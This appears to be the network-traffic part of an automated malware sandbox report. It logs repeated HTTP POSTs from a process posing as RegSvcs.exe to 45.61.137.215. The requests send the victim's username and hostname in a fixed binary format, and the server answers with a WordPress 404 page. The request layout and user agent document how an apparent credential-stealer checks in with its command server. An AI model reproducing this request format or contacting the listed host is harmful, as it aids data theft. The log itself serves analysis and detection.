May 29, 2024 15:43:41.307710886 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:43:41.307743073 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:43:41.307776928 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:41.307811022 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:41.307848930 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:41.307955027 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	49750	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:41.466952085 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:41.471887112 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:43.948173046 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:42 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:43.948203087 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:43.948213100 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:43.948225021 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:43.948236942 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:43.948317051 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:43.948348999 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:43.948358059 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:43.948431015 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:43.948457003 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	49751	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:44.149214029 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:44.158622026 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:46.674073935 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:44 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:46.674097061 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:46.674108982 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:46.674119949 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:46.674130917 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:46.674247980 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:46.674266100 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:46.674277067 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:46.674468040 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:46.674480915 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	49752	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:46.833672047 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:46.838907003 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:49.354408979 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:47 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:49.354433060 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:49.354441881 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
